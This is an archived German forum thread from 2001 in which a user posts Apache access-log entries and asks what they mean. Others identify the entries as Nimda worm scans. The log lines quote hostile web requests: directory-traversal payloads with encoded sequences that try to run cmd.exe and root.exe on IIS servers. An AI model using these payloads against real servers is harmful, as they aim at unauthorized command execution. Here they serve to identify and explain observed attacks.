PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : ACHTUNG !!! (bitte bitte bitte)



beiderTelekom
14.10.01, 15:52
Wie fang ich an hmmm....

Da saß ich nun. Nach langem konfigurations stress war es fertig . Ich war mit meinen
Server umgezogen, unzwar nach Hause.
Also tat ich wie mir befohlen . Ein reboot.

Das ergebniss war erschreckend schön ...(bis
auf den Nameserver ...:-(
Als ich vom Windos drauf zugriff, auf den nun arbeitenden Apache-Server (linux), funktionierte es. PLOPP die Webseite erschien.
Ich freute mich LOL.
Aber nicht lange ...
als ich in die /var/log/httpd/access--log
schaute erschrak ich.
WAT DAT DENN !!!
da war nicht nur mein Log vom Winni rechner

ne
da
war

217.81.51.1 - -[24/Sep/2001:23:48:46 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 291

ich lass jetzt mal die zeit und ip angabe weg weil es so ca 1-2 mal pro sec scanned

"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 291

"GET /c/winnt/system32/cmd.exe?c+dir HTTP/1.0" 404 289"

"GET /d/winnt/system32/cmd.exe?/c+dir HTPP/1.0" 404 299

"/scripts/ ..%25c../winnt/system32

"/_vti_bin/ ..%25c../ ..%255c../ ..%255c../winnt/system32?/c+dir HTTP/1.0" 404 330

"/_mem_bin/ ..%25c../ ..%255c../ ..%255c../winnt/system32?/c+dir HTTP/1.0" 404 330

"/msdac/ ..%25c../ ..%255c../ ..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330

"/scripts/ ..%c1%c1../winnt/system32/
cmd.exe?/c+dir HTTP/1.0" 404 312


"/scripts/ ..%c0%2f../winnt/system32/
cmd.exe?/c+dir HTTP/1.0" 404 312


"/scripts/ ..%c0%af../winnt/system32/
cmd.exe?/c+dir HTTP/1.0" 404 312


hier nur die änderung

/ ..%c1%9c../
/ ..%%35%63../
/ ..%%35c../
/ ..%25%35%63../
/ ..%252f../

...
und ich will wissen

ersten was tut das ding


hmmm....

jetzt an EUCH die FRAGE :

wer hat das gleiche problem in seinem LOG buch gehabt ...

schickt mir diese einträge bitte :

an illegal@www.daytrance.dns2go.com

schickt mir auch infos über das ding ...


[ 14. Oktober 2001: Beitrag editiert von: Ich arbeite bei der Telekom ]

[ 14. Oktober 2001: Beitrag editiert von: Ich arbeite bei der Telekom ]

Jaydee
14.10.01, 16:44
Hallo,

dies ist der NIMDA Wurm....

Anhande der IP-Adresse am Anfang der zeilen, siehst Du den Rechner von welchem diese Anfragen gestellt wurden.

Dieser Wurm befällt aber nur Microsoft Webserver, Dein Apache lacht da nur drüber :)

Gruß und no panic!

aleksis
15.10.01, 22:27
ich hatte auch diese einträge, als ich mit ethereal rumprobiert habe.
hab gedacht das wäre ein hacker, der versucht bei mir drauifzukommen.
das cmd.exe hat mich aber beruhigt. ;-)